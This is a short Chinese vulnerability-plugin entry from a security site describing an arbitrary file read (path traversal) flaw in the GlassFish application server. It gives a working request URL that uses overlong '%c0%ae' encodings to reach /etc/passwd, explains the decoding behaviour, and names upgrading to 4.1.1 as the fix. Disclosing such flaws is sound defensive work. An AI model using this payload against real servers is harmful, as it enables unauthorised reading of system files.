安全脉搏

GodTouch-IDGODTouch-2016-00038
插件作者GodTouch
插件名称应用服务器glassfish任意文件读取漏洞
漏洞危害
漏洞类型任意文件遍历漏洞
来源致谢 http://www.secpulse.com/archives/42277.html
漏洞描述http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd java语音中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。
CVE编号
插件代码



你未登录或者级别未达到要求



修复方法升级到glassfish 4.1.1
插件状态已发布
提交时间2016-01-14 21:02:09
商务合作:

root@secpulse.com

合作邮箱:

root@secpulse.com

联系QQ:

2869164203

官方Q群:

375995060